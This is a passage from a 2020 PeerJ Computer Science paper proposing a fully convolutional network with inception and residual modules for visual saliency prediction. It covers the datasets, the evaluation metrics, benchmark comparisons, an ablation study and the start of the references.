size. The transposed convolution layers contain un-pooling and convolution operators. Unlike the max-pooling operation, the un-pooling operation increases the size of feature maps through the decoding stage. In addition, the image input size of the proposed model is 224 × 224 pixels. Figure 1 illustrates the proposed model architecture to predict visual saliency. Three inception modules are also used in the proposed model. Inception modules are useful because they benefit from different sized filters in one layer, which contributes to the multi-scale inference and enhances contextual information (Long, Shelhamer & Darrell, 2015). In addition, a residual module is also added to the proposed model because it effectively avoids the vanishing gradient problem by introducing an identity shortcut connection (Lin et al., 2014). Moreover, activations from a previous layer are reused by the residual module for the adjacent layer to learn its weights. Figure 2 shows the architecture of the inception and residual modules, respectively. Figure 2A explains the layers of the inception module which contains three branches. The first two contain a sequence of two convolution filters, where the patch sizes of the layers are 1×1, the second layer is 3×3, and Ghariba et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.280 5/20 https://peerj.com https://doi.org/10.7717/peerjcs.280/fig-1 http://dx.doi.org/10.7717/peerj-cs.280 Figure 2 Architecture of (A) Inception and (B) residual modules. Full-size DOI: 10.7717/peerjcs.280/fig-2 Table 2 Configuration of inception and residual modules. Module Convolutional configuration Operation Output Inception 1×1,256 3×3,256 1×1,256 5×5,256 1×1,256 Concatenation 256 Residual 1×1,32 3×3,64 1×1,64 1×1,64 Element-wise sum 64 the last layer is 5×5, respectively. The third branch contains only one convolutional filter which has a patch size of 1×1. Each convolutional layer is followed by batch normalization and ReLU. Figure 2B explains the structure of the residual module, which contains two branches. The first branch has a stack of three convolutional filters, sized 1×1, 3×3, and 1×1, respectively. The second branch has a single 1×1 convolutional filter. The two branches are combined by element-wise summation. Table 2 explains the number of each filter in the two modules (i.e., inception and residual). Notably, the convolutional module contains a Convolutional 2D, Batch Normalization, as well as a ReLU layer. The transposed convolutional module also contains the same layers as the convolutional module. Ghariba et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.280 6/20 https://peerj.com https://doi.org/10.7717/peerjcs.280/fig-2 http://dx.doi.org/10.7717/peerj-cs.280 Semantic segemnation The segmentation task plays an important role in image understanding and is essential for image analysis tasks (Karami, Shehata & Smith, 2018). In semantic segmentation, each region or pixel is labeled as a class, such as flower, person, road, sky, ocean, or car. Many applications use semantic segmentation techniques, such as autonomous driving, Bio Medical Image Diagnosis, robotic navigation, localization, and scene understanding. Furthermore, Deep Neural Networks (DNNs) are commonly used as effective techniques for semantic segmentation (Long, Shelhamer & Darrell, 2015). Semantic segmentation works with semantics and location; global information determines the ‘‘what’’ while local information determines the ‘‘where’’ of an image. Deep feature hierarchies encode semantics and location in a nonlinear local-to-global pyramid (Long, Shelhamer & Darrell, 2015). Our proposed model (i.e., FCN) uses semantic segmentation techniques to assign each pixel in the given image into appropriate classes (i.e., foreground or background) in order to predict visual saliency (i.e., saliency map generation). Datasets The proposed model was trained using a standard available dataset (i.e., SALICON) and subsequently tested on four other well-established datasets, including TORONTO, MIT 300, MIT1003, and DUT-OMRON. All these datasets have different characteristics and so each is described below. SALICON The largest dataset for visual attention applications on the popular Microsoft Common Objects in Context (MS COCO) image database is SALICON (Lin et al., 2014). This dataset contains 10,000 training, 5,000 validation, and 5,000 testing images with a fixed resolution of 480x640. While this dataset contains the ground truth data for the training and validation datasets, the test dataset ground truth data were unavailable (Jiang et al., 2015). TORONTO One of the most widely used datasets for visual attention is the TORONTO dataset. It has 120 color images with a resolution of 511x681 pixels. This dataset contains images that were captured in indoor and outdoor environments and has been free-viewed by 20 human subjects (Bruce & Tsotsos, 2006). MIT300 The MIT300 dataset has 300 natural images and the eye-tracking data of 39 users who free viewed these images were used to generate saliency maps. This dataset is challenging since its images are highly variable and natural (Judd, Durand & Torralba, 2012). A MIT saliency benchmark website for model evaluation (http://saliency.mit.edu/results_mit300.html) is available to evaluate any saliency model using this dataset. MIT1003 MIT1003 includes 1,003 images from the Flicker and LabelMe collections. Saliency maps of these images have also been generated from the eye-tracking data of 15 users. This dataset Ghariba et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.280 7/20 https://peerj.com http://saliency.mit.edu/results_mit300.html http://dx.doi.org/10.7717/peerj-cs.280 contains 779 landscape and 228 portrait images that vary in size from 405 × 405 to 1,024 × 1,024 pixels, making it the largest available eye fixation dataset (Judd et al., 2009). DUT-OMRON DUT-OMRON has 5,168 high quality images that were manually selected from over 140,000 images. The largest height or width of this dataset is 400 pixels and each image is represented by five subjects. There is more than one salient object in this type of dataset and the image has a more a complex background (Riche et al., 2013). Evaluation metrics Several methods may be used to evaluate the correspondence between human eye fixation and model prediction (Ghariba, Shehata & McGuire, 2019). Generally, saliency evaluation metrics are divided into distribution- and location-based metrics. Previous studies on saliency metrics found it is difficult to perform a reasonable comparison for assessing saliency models using a single metric (Riche et al., 2013). Here, we accomplished our experiment by extensively considering several different metrics, including the Similarity Metric (SIM), Normalized Scanpath Saliency (NSS), and AUC. The last metric is the area under the receiver operating characteristic (ROC) curve (e.g., AUC-Borji, and AUC-Judd). For clarification, we indicate the map of fixation locations as Q, the predicted saliency map as S, and the continuous saliency map (distribution) as G. Similarity Metric (SIM) The SIM metric produces a histogram that is a measurement of the similarity between two distributions. This metric considers the normalized probability distributions of both the saliency and human eye fixation maps. SIM is also computed as the sum of the minimum values at each pixel, after normalizing the input maps. Equation (1) explains how to calculate the SIM metric. SIM= ∑ i=1 min(Ś(i),Ǵ(i)), (1) where ∑ iŚ (i)=1, and ∑ iǴ (i)=1, and Ś and Ǵ are the normalized saliency and the fixation maps, respectively. Importantly, a similarity of one indicates that the distributions are the same whereas a zero indicates that they do not overlap. Normalized Scanpath Saliency (NSS) NSS was is a simple correspondence measure between saliency maps and ground truth data, computed as the average normalized saliency at fixated locations. NSS is, however, susceptible to false positives and relative differences in saliency across the image (Bylinskii et al., 2018). To calculate NSS given a saliency map S and a binary map of fixation location F, NSS= 1 N N∑ i=1 S̄(i)xF(i), (2) where N= ∑ iF(i) and S̄= S−µ(s) σ(S) , and N is the total number of human eye positions and σ( S) is the standard deviation. Ghariba et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.280 8/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.280 Table 3 Comparison of the quantitative scores of several models on the TORONTO (Bruce & Tsotsos, 2006) dataset. Model NSS SIM AUC-Judd AUC-Borji ITTI 1.30 0.45 0.80 0.80 AIM 0.84 0.36 0.76 0.75 Judd Model 1.15 0.40 0.78 0.77 GBVS 1.52 0.49 0.83 0.83 Mr-CNN 1.41 0.47 0.80 0.79 CAS 1.27 0.44 0.78 0.78 Proposed Model 1.52 0.46 0.80 0.76 AUC-Borji The AUC-Borji metric, based on Ali Borji’s code (Borji et al., 2013), uses a uniform random sample of image pixels as negatives and defines false positives as any fixation (saliency) map values above the threshold of these pixels. The saliency map is a binary classifier that separates positive from negative samples at varying thresholds, the values of which are sampled at a fixed step size. The proportion of the saliency map values above the threshold at the fixation locations is the true positive (TP) rate. Conversely, the proportion of the saliency map values that occur above the threshold sampled from random pixels (as many samples as fixations, sampled uniformly from all image pixels) is the false positive rate (FP). AUC-Judd The AUC-Judd metric (Judd et al., 2009) is also popular for the evaluation of saliency models. As with AUC-Borji, positive and negative samples are separated at various thresholds by treating the saliency map as a binary classifier. Unlike AUC-Borji, however, the thresholds are sampled from the saliency map’s values. The proportion of the saliency map’s values above a specific threshold at specific fixation locations is known as the true positive (tp) rate. Alternatively, the proportion of the saliency map’s values that occur above the threshold of non-fixated pixels is the false positive (fp) rate. EXPERIMENTAL RESULTS This Section explains all the steps for implementing our work (see Table 3 for more details about experimental steps). Specifically, training, adjusting the parameters, validating, and testing the proposed model on the aforementioned datasets (e.g., TORONTO, MIT300, MIT1003, and DUT-OMRON) are described in details. Model training The most important step for the proposed model is model training. In this work, the proposed model was trained from scratch (i.e., full-training). Training of models from scratch is challenging due to computational and data availability, leading to problems of overfitting. However, there are several techniques, such as normalization, data augmentation, and dropout layers that are useful for mitigating the problems generated from overfitting. Ghariba et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.280 9/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.280 The full-training style has two different categories. In the first category, the CNN architecture is fully designed and trained from scratch. In this case, the number of CNN, pooling layers, the kind of activation function, neurons, learning rate, and the number of iterations should be determined. In the second category, the network architecture and the number of parameters remain unchanged, but the advantages of pre-existing architecture and full-training is applied to given images. In this study, the first category was employed. Specifically, the proposed model was trained using the well-known dataset, SALICON (see ‘SALICON’ for more details) and was also validated using a specific validation dataset (i.e., 5000 images). This dataset is the largest available for visual attention (i.e., 10,000 images for training, 5,000 for validation) and was created for saliency applications. At the beginning of the training task, all filter weights were randomly initialized because a pre-trained network was not used in this study. A mini-batch of 16 images was used in each iteration and the learning rate was set as 0.001. The proposed model parameters were learned using the back-propagating loss function by stochastic gradient descent with a momentum (SGDM) optimizer. Since the number of images available for the training task was limited (i.e., 10,000 images), we suggested using the date augmentation technique to increase the number of training images by creating modified versions of images in the dataset. This technique was carried out to mitigate overfitting by rotating at 30◦ intervals. This technique also improves performance and the proposed model’s ability for generalization. Figure 3 illustrates the proposed model’s training progress from the mentioned training images (SALICON). Model testing In this step, we evaluated the proposed model using very well-known datasets including TORONTO, MIT300, MIT1003, and DUT-OMRON. Based on the experimental results, one can see the proposed model has the ability to predict visual saliency in a given image. The output of the test image is described as the saliency map, which can be obtained from the last layer of the proposed model. All the training and testing tasks were performed on an Intel CPU i7-3370K machine with 3.5 GHz and 16 GB RAM memory. An NVIDIA GeForce GTX 1080 Ti GPU with 11 GB of memory under CUDA version 8.0 was also utilized in this work. DISCUSSION Quantitative comparison of the proposed model with other advanced models To evaluate the efficiency of the proposed model for predicting visual saliency, we compared it to 10 state-of-the-art models, ITT, AIM, Judd Model, GBVS, Mr-CNN, CAS, SalGAN, DeepGaze I, DeepGaze II, and ML-NET. The models were applied to four datasets (i.e., TORONTO, MIT300, MIT1003, and DUT-OMRON), and the quantitative results are presented in Tables 3, 4, 5 and 6, respectively. All these models differ in terms of computational speed (i.e., run time). Table 7 explains the runtime properties of the proposed model as well as the other 10 visual saliency models. From this table, one can see Ghariba et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.280 10/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.280 Figure 3 Value of validation accuracy (A) and loss as a function of epochs (B). Full-size DOI: 10.7717/peerjcs.280/fig-3 the run time of the proposed model is about 12 s on our machine which has no GPU and is an Intel CPU i7-3370K. Notably, the main difference between the proposed model and other state-of-art models is that the proposed model was specifically designed for saliency prediction, whereas the other pre-trained models were essentially designed for object recognition and then fine-tuned for the visual saliency prediction task. In addition, the proposed model was trained from scratch, which requires a large number of training images to provide a reasonable performance; however, the largest dataset available for this application contains only 10,000 images (e.g., SALICON), which is considered relatively small to train a model from scratch. Table 3 shows that, with the TORONTO dataset, the proposed model outperforms other models (deep and classical models) in terms of NSS; however, in terms of SIM, AUC-Judd, and AUC-Borji, the GBVS model provides the best results (note that the bolded values are the best results). From Table 4, one can see that with the MIT300 dataset, the model that provides the best performance is DeepGaz II in terms of the AUC-Judd and AUC-Borji metrics. However, the SalGAN model produces the best results for the SIM metric, while the ML-NET model provides the best value for the NSS metric. In Table 5 (for MIT1003 dataset), one can see that the proposed model surpasses the other models in terms of the Ghariba et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.280 11/20 https://peerj.com https://doi.org/10.7717/peerjcs.280/fig-3 http://dx.doi.org/10.7717/peerj-cs.280 Table 4 Comparison of the quantitative scores of several models on the MIT300 (Judd, Durand & Tor- ralba, 2012) dataset. Model NSS SIM AUC-Judd AUC-Borji ITTI (Itti, Koch & Niebur, 1998) 0.97 0.44 0.75 0.74 AIM (Bruce & Tsotsos 2006) 0.79 0.40 0.77 0.75 Judd Model (Judd et al., 2009) 1.18 0.42 0.81 0.80 GBVS (Harel, Koch & Perona, 2007) 1.24 0.48 0.81 0.80 Mr-CNN (Liu et al., 2016) 1.13 0.45 0.77 0.76 CAS (Goferman, Zelnik-Manor & Tal, 2011) 0.95 0.43 0.74 0.73 SalGAN (Pan et al., 2016) 2.04 0.63 0.86 0.81 DeepGaze I (Kümmerer, Theis & Bethge, 2014) 1.22 0.39 0.84 0.83 DeepGaze II (Kümmerer et al., 2017) 1.29 0.46 0.87 0.86 ML-NET (Cornia et al., 2016) 2.05 0.59 0.85 0.75 Proposed Model 1.73 0.42 0.80 0.71 Table 5 Comparison of the quantitative scores of several models on the MIT1003 (Judd et al., 2009) dataset. Model NSS SIM AUC-Judd AUC-Borji ITTI 1.10 0.32 0.77 0.76 AIM 0.82 0.27 0.79 0.76 Judd Model 1.18 0.42 0.81 0.80 GBVS 1.38 0.36 0.83 0.81 Mr-CNN 1.36 0.35 0.80 0.77 CAS 1.07 0.32 0.76 0.74 SalGAN 1.31 0.64 0.78 0.75 ML-NET 1.64 0.35 0.82 – Proposed Model 1.35 0.44 0.88 0.78 Table 6 Comparison of the quantitative scores of several models on the DUT-OMRON (Yang et al., 2013) dataset. Model NSS SIM AUC-Judd AUC-Borji ITTI 3.09 0.53 0.83 0.83 AIM 1.05 0.32 0.77 0.75 GBVS 1.71 0.43 0.87 0.85 CAS 1.47 0.37 0.80 0.79 Proposed Model 1.84 0.45 0.88 0.76 SIM and AUC-Judd metrics, while the GBVS model provides the best results for the NSS metric. Finally, Table 6 shows that, with the DUT-OMRON dataset, the proposed model achieved the best result in terms of the AUC-Judd metric, while the GBVS model is the best in terms of the AUC-Borji metric. Ghariba et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.280 12/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.280 Table 7 Runtime of the proposed model and ten visual saliency models. Model Training Deep Learning Run Time BMS No No 0.3 S CAS No No 16 S GBVS No No 2 S ITTI No No 4 S Mr-CNN yes Yes 14 S (GPU) SalNet yes Yes 0.1 S (GPU) eDn yes Yes 8 S (GPU) AIM yes No 2 S Judd Model yes No 10 S DVA yes Yes 0.1 S (GPU) Proposed Model yes Yes 12 S Qualitative comparison of the proposed model with other advanced models The qualitative results obtained by the proposed model are compared with five state- of-the art models, ITTI, FES, CovSal, GBVS, and SDS-GM (Li & Mou, 2019), on the aforementioned datasets (i.e., TORONTO, MIT300, MIT1003, and DUT-OMRON). Figure 4 shows the visual saliency map results and the proposed model visual saliency prediction, i.e., generating saliency map, within the given images. Based on the evaluation of the proposed model, the proposed model produces saliency maps comparable to other state-of-the-art models. Ablation study In this work, we evaluated several different aspects of the proposed model’s architecture. Table 8 illustrates the results of the experiments conducted in this work. Based on the architecture of the proposed model, we suggested 13 different scenarios in order to find an optimum architecture. Several conclusions were obtained based on these experiments: (1) From scenarios S1 to S4, we can see the best global accuracy is achieved with 3 encoder-3 decoder stages (i.e., global accuracy was 85.05% and loss function was 0.2384). (2) S7 describes the proposed model using 3 convolutional modules & 3 inception modules. This architecture also produced the best global accuracy (i.e., global accuracy was 93.63%, and loss function was 0.1051) compared to S5 and S6, which contain one and two inception modules, respectively. (3) S13 is the last scenario we selected as the entire model, including 3 convolutional, 3 inception, and 1 residual module (i.e., Fig. 1). This scenario produced a higher global accuracy (i.e., global accuracy was 97.05%, and loss function was 0.07) compare to those of scenarios S11 and S12. CONCLUSIONS A new deep CNN model has been proposed in this paper for predicting visual saliency in the field of view. The main novelty of this model is its use of a new deep learning Ghariba et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.280 13/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.280 Figure 4 The saliency maps obtained from the proposed model and five other state-of-the-art models for a sample image from the TORONTO, MIT300, MIT1003, and DUT-OMRON datasets. Full-size DOI: 10.7717/peerjcs.280/fig-4 Ghariba et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.280 14/20 https://peerj.com https://doi.org/10.7717/peerjcs.280/fig-4 http://dx.doi.org/10.7717/peerj-cs.280 Table 8 Different FCN models applied in this study. FCN Models Training Validation Scenarios Description Accuracy Loss Accuracy Loss S1 2 convolutional modules 79.14% 0.2650 78.88% 0.2700 S2 3 convolutional modules 85.05% 0.2384 83.08% 0.2571 S3 4 convolutional modules 83.47% 0.2548 82.94% 0.2608 S4 5 convolutional modules & 80.04% 0.2873 76.52% 0.2775 S5 3 convolutional modules & 1 inception modules 89.69% 0.2119 85.05% 0.2231 S6 3 convolutional modules & 2 inception modules 90.84% 0.1995 85.37% 0.2454 S7 3 convolutional modules & 3 inception modules 93.63% 0.1051 89.24% 0.1666 S8 3 convolutional modules & 1 residual modules 87.55% 0.2138 84.97% 0.2317 S9 3 convolutional modules & 2 residual modules 83.23% 0.2597 82.10% 0.2684 S10 3 convolutional modules & 3 residual modules 81.66% 0.2750 79.12% 0.2921 S11 3 convolutional modules & 1 inception module & 1 residual module 89.46% 0.1829 88.59% 0.1889 S12 3 convolutional modules & 2 inception module & 1 residual module 92.73% 0.1255 89.92% 0.2111 S13 3 convolutional modules & 3 inception module & 1 residual module 97.05% 0.07 90.64% 0.1588 network with three encoders and three decoders (convolution and deconvolution) for visual saliency prediction, as well as its inclusion of two modules (inception and residual modules). The proposed model was trained from scratch and used the data augmentation technique to produce variations of images. The experiment results illustrate that the proposed model achieves superior performance relative to other state-of-the-art models. Moreover, we discovered that an increase in the number of training images will increase the model prediction accuracy (i.e., improvement in model performance); however, the implementation of the model requires a large amount of memory and so it is difficult to use large numbers of training images. Furthermore, because the model was trained from scratch, we expected the model will require more training data that other models, which are currently unavailable. A promising direction for future research is to collect a new dataset, generate its ground truth, and design new models with good performance and improved evaluation metrics based on the one proposed herein. Extending the proposed model and applying it to examples of dynamic saliency (i.e., video images), is another plausible and interesting avenue of research. The proposed model may also facilitate other tasks, such as scene classification, salient object detection, and object detection, making it applicable in a number of disciplines. Importantly, future models based on that proposed herein should be able to learn from high-level understanding, so they are able to, for example, detect the most important object of the image (e.g., focusing on the most important person in the room). Saliency models also need to understand high-level semantics in the visual scene (i.e., semantic gap), and cognitive attention studies can help to overcome some of the restrictions identified in the proposed model. Ghariba et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.280 15/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.280 ADDITIONAL INFORMATION AND DECLARATIONS Funding Bashir Muftah Ghariba received financial support from the Libyan Ministry of Higher Education and Scientific Research, and Elmergib University, Alkhums, for the PhD program. Memorial University of Newfoundland supported the publication fee. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Libyan Ministry of Higher Education and Scientific Research. Elmergib University, Alkhums. Memorial University of Newfoundland. Competing Interests The authors declare there are no competing interests. Author Contributions • Bashir Muftah Ghariba conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • Mohamed S Shehata conceived and designed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • Peter McGuire conceived and designed the experiments, prepared figures and/or tables, and approved the final draft. Data Availability The following information was supplied regarding data availability: The raw data and code are available at: - Bylinskii et al., (2012): ‘‘MIT Saliency Benchmark’’. MIT. Dataset. http://saliency.mit. edu/results_mit300.html. - Ghariba, Shehata & McGuire (2019): ‘‘Saliency-_model_-2019’’. Github. Code. https://github.com/Bashir2020/Saliency-_model_-2019. REFERENCES Borji A, Itti L. 2012. State-of-the-art in visual attention modeling. IEEE Transactions on Pattern Analysis and Machine Intelligence 35:185–207. Borji A, Tavakoli HR, Sihite DN, Itti L. 2013. Analysis of scores, datasets, and models in visual saliency prediction. In: Proceedings of the IEEE international conference on computer vision. Piscataway: IEEE, 921–928. Bruce ND, Catton C, Janjic S. 2016. A deeper look at saliency: Feature contrast, seman- tics, and beyond. In: Proceedings of the IEEE conference on computer vision and pattern recognition. Piscataway: IEEE, 516–524. Ghariba et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.280 16/20 https://peerj.com http://saliency.mit.edu/results_mit300.html http://saliency.mit.edu/results_mit300.html https://github.com/Bashir2020/Saliency-_model_-2019 http://dx.doi.org/10.7717/peerj-cs.280 Bruce N, Tsotsos J. 2006. Saliency based on information maximization. In: Advances in neural information processing systems. Cambridge: MIT Press, 155–162. Bylinskii Z, Judd T, Oliva A, Torralba A, Durand F. 2018. What do different evaluation metrics tell us about saliency models? IEEE Transactions on Pattern Analysis and Machine Intelligence 41:740–757. Cheng G, Han J, Guo L, Liu Z, Bu S, Ren J. 2015. Effective and efficient midlevel visual elements-oriented land-use classification using VHR remote sensing images. IEEE Transactions on Geoscience and Remote Sensing 53:4238–4249 DOI 10.1109/TGRS.2015.2393857. Cornia M, Baraldi L, Serra G, Cucchiara R. 2016. A deep multi-level network for saliency prediction. In: 2016 23rd International Conference on Pattern Recognition (ICPR). Piscataway: IEEE, 3488–349. Deng J, Dong W, Socher R, Li L-J, Li K, Fei-Fei L. 2009. Imagenet: a large-scale hier- archical image database. In: 2009 IEEE conference on computer vision and pattern recognition. IEEE, 248–255. Fang S, Li J, Tian Y, Huang T, Chen X. 2016. Learning discriminative subspaces on random contrasts for image saliency analysis. IEEE Transactions on Neural Networks and Learning Systems 28:1095–1108. Fu K, Gong C, Gu IY-H, Yang J. 2015. Normalized cut-based saliency detection by adaptive multi-level region merging. IEEE Transactions on Image Processing 24:5671–5683 DOI 10.1109/TIP.2015.2485782. Gao D, Han S, Vasconcelos N. 2009. Discriminant saliency, the detection of suspicious coincidences, and applications to visual recognition. IEEE Transactions on Pattern Analysis and Machine Intelligence 31:989–1005 DOI 10.1109/TPAMI.2009.27. Gao D, Mahadevan V, Vasconcelos N. 2008. The discriminant center–surround hypothesis for bottom-up saliency. In: Advances in neural information processing systems. 497–504. Gao D, Vasconcelos N. 2005. Discriminant saliency for visual recognition from cluttered scenes. In: Advances in neural information processing systems. 481–488. Ghariba B, Shehata MS, McGuire P. 2019. Visual saliency prediction based on deep learning. Information 10:257 DOI 10.3390/info10080257. Girshick R, Donahue J, Darrell T, Malik J. 2014. Rich feature hierarchies for accurate object detection and semantic segmentation. In: Proceedings of the IEEE conference on computer vision and pattern recognition. Piscataway: IEEE, 580–587. Goferman S, Zelnik-Manor L, Tal A. 2011. Context-aware saliency detection. IEEE transactions on pattern analysis and machine intelligence. 1915–1926. Gong C, Tao D, Liu W, Maybank SJ, Fang M, Fu K, Yang J. 2015. Saliency propagation from simple to difficult. In: Proceedings of the IEEE conference on computer vision and pattern recognition. 2531–2539. Guo F, Wang W, Shen J, Shao L, Yang J, Tao D, Tang YY. 2017. Video saliency detection using object proposals. IEEE Transactions on Cybernetics 48:3159–3170. Harel J, Koch C, Perona P. 2007. Graph-based visual saliency. In: Advances in neural information processing systems. Cambridge: MIT Press, 545–552. Ghariba et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.280 17/20 https://peerj.com http://dx.doi.org/10.1109/TGRS.2015.2393857 http://dx.doi.org/10.1109/TIP.2015.2485782 http://dx.doi.org/10.1109/TPAMI.2009.27 http://dx.doi.org/10.3390/info10080257 http://dx.doi.org/10.7717/peerj-cs.280 Huang J, Yang X, Fang X, Lin W, Zhang R. 2011. Integrating visual saliency and consistency for re-ranking image search results. IEEE Transactions on Multimedia 13:653–661 DOI 10.1109/TMM.2011.2127463. Huang X, Shen C, Boix X, Zhao Q. 2015. Salicon: reducing the semantic gap in saliency prediction by adapting deep neural networks. In: Proceedings of the IEEE interna- tional conference on computer vision. Piscataway: IEEE, 262–270. Itti L, Koch C, Niebur E. 1998. A model of saliency-based visual attention for rapid scene analysis. IEEE Transactions on Pattern Analysis and Machine Intelligence 20:1254–1259 DOI 10.1109/34.730558. Jetley S, Murray N, Vig E. 2016. End-to-end saliency mapping via probability distribu- tion prediction. In: Proceedings of the IEEE conference on computer vision and pattern recognition. 5753–5761. Jiang M, Huang S, Duan J, Zhao Q. 2015. Salicon: Saliency in context. In: Proceedings of the IEEE conference on computer vision and pattern recognition. Piscataway: IEEE, 1072–1080. Judd T, Durand F, Torralba A. 2012. A benchmark of computational models of saliency to predict human fixations. In: MIT Technical Report. MIT-CSAIL-TR-2012-001. Cambridge: MIT. Judd T, Ehinger K, Durand F, Torralba A. 2009. Learning to predict where humans look. In: 2009 IEEE 12th international conference on computer vision. Piscataway: IEEE, 2106–2113. Kanan C, Tong MH, Zhang L, Cottrell GW. 2009. SUN: Top-down saliency using natural statistics. Visual Cognition 17:979–1003 DOI 10.1080/13506280902771138. Karami E, Shehata MS, Smith A. 2018. Adaptive polar active contour for segmentation and tracking in ultrasound videos. IEEE Transactions on Circuits and Systems for Video Technology 29:1209–1222. Krizhevsky A, Sutskever I, Hinton GE. 2012. Imagenet classification with deep con- volutional neural networks. In: Advances in neural information processing systems. Cambridge: MIT Press, 1097–1105. Kruthiventi SS, Ayush K, Babu RV. 2017. Deepfix: a fully convolutional neural net- work for predicting human eye fixations. IEEE Transactions on Image Processing 26:4446–4456 DOI 10.1109/TIP.2017.2710620. Kruthiventi SS, Gudisa V, Dholakiya JH, Venkatesh Babu R. 2016. Saliency unified: A deep architecture for simultaneous eye fixation prediction and salient object segmentation. In: Proceedings of the IEEE conference on computer vision and pattern recognition. Piscataway: IEEE, 5781–5790. Kümmerer M, Theis L, Bethge M. 2014. Deep gaze i: Boosting saliency prediction with feature maps trained on imagenet. ArXiv preprint. arXiv:14111045. Kümmerer M, Wallis TS, Bethge M. 2016. DeepGaze II: Reading fixations from deep features trained on object recognition. ArXiv preprint. arXiv:161001563. Kümmerer M, Wallis TS, Gatys LA, Bethge M. 2017. Understanding low-and high- level contributions to fixation prediction. In: Proceedings of the IEEE International Conference on Computer Vision. Piscataway: IEEE, 4789–4798. Ghariba et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.280 18/20 https://peerj.com http://dx.doi.org/10.1109/TMM.2011.2127463 http://dx.doi.org/10.1109/34.730558 http://dx.doi.org/10.1080/13506280902771138 http://dx.doi.org/10.1109/TIP.2017.2710620 http://arXiv.org/abs/14111045 http://arXiv.org/abs/161001563 http://dx.doi.org/10.7717/peerj-cs.280 Le Meur O, Le Callet P, Barba D, Thoreau D. 2006. A coherent computational approach to model bottom-up visual attention. IEEE Transactions on Pattern Analysis and Machine Intelligence 28:802–817 DOI 10.1109/TPAMI.2006.86. Li Y, Hou X, Koch C, Rehg JM, Yuille AL. 2014. The secrets of salient object segmenta- tion. In: Proceedings of the IEEE conference on computer vision and pattern recognition. Piscataway: IEEE, 280–287. Li Y, Mou X. 2019. Saliency detection based on structural dissimilarity induced by image quality assessment model. Journal of Electronic Imaging 28:023025. Lin T-Y, Maire M, Belongie S, Hays J, Perona P, Ramanan D, Dollár P, Zitnick CL. 2014. Microsoft coco: Common objects in context. In: European conference on computer vision. Piscataway: IEEE, 740–755. Liu N, Han J. 2016. Dhsnet: Deep hierarchical saliency network for salient object detection. In: Proceedings of the IEEE conference on computer vision and pattern recognition. Piscataway: IEEE, 678–686. Liu N, Han J, Liu T, Li X. 2016. Learning to predict eye fixations via multiresolution convolutional neural networks. IEEE Transactions on Neural Networks and Learning Systems 29:392–404. Liu Z, Zhang X, Luo S, Le Meur O. 2014a. Superpixel-based spatiotemporal saliency detection. IEEE Transactions on Circuits and Systems for Video Technology 24:1522–1540 DOI 10.1109/TCSVT.2014.2308642. Liu Z, Zou W, Meur OLe. 2014b. Saliency tree: A novel saliency detection framework. IEEE Transactions on Image Processing 23:1937–1952 DOI 10.1109/TIP.2014.2307434. Long J, Shelhamer E, Darrell T. 2015. Fully convolutional networks for semantic segmentation. In: Proceedings of the IEEE conference on computer vision and pattern recognition. Piscataway: IEEE, 3431–3440. Lu X, Li X. 2013. Multiresolution imaging. IEEE Transactions on Cybernetics 44:149–160. Lu X, Li X, Mou L. 2014. Semi-supervised multitask learning for scene recognition. IEEE Transactions on Cybernetics 45:1967–1976. Mackenzie AK, Harris JM. 2017. A link between attentional function, effective eye move- ments, and driving ability. Journal of Experimental Psychology: Human Perception and Performance 43:381. Mahadevan V, Vasconcelos N. 2009. Saliency-based discriminant tracking. In: 2009 IEEE conference on computer vision and pattern recognition. Piscataway: IEEE, 1007–1013. Mahdianpari M, Salehi B, Rezaee M, Mohammadimanesh F, Zhang Y. 2018. Very deep convolutional neural networks for complex land cover mapping using multispectral remote sensing imagery. Remote Sensing 10:1119 DOI 10.3390/rs10071119. Pan J, Sayrol E, Giro-i Nieto X, McGuinness K, O’Connor NE. 2016. Shallow and deep convolutional networks for saliency prediction. In: Proceedings of the IEEE conference on computer vision and pattern recognition. Piscataway: IEEE, 598–606. Riche N, Duvinage M, Mancas M, Gosselin B, Dutoit T. 2013. Saliency and human fixations: State-of-the-art and study of comparison metrics. In: Proceedings of the IEEE international conference on computer vision. Piscataway: IEEE, 1153–1160. Ghariba et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.280 19/20 https://peerj.com http://dx.doi.org/10.1109/TPAMI.2006.86 http://dx.doi.org/10.1109/TCSVT.2014.2308642 http://dx.doi.org/10.1109/TIP.2014.2307434 http://dx.doi.org/10.3390/rs10071119 http://dx.doi.org/10.7717/peerj-cs.280 Simonyan K, Zisserman A. 2014. Very deep convolutional networks for large-scale image recognition. ArXiv preprint. arXiv:14091556. Szegedy C, Liu W, Jia Y, Sermanet P, Reed S, Anguelov D, Erhan D, Vanhoucke V, Rabinovich A. 2015. Going deeper with convolutions. In: Proceedings of the IEEE conference on computer vision and pattern recognition. Piscataway: IEEE, 1–9. Vig E, Dorr M, Cox D. 2014. Large-scale optimization of hierarchical features for saliency prediction in natural images. In: Proceedings of the IEEE conference on computer vision and pattern recognition. Piscataway: IEEE, 2798–2805. Wang W, Shen J. 2017. Deep visual attention prediction. IEEE Transactions on Image Processing 27:2368–2378. Wang W, Shen J, 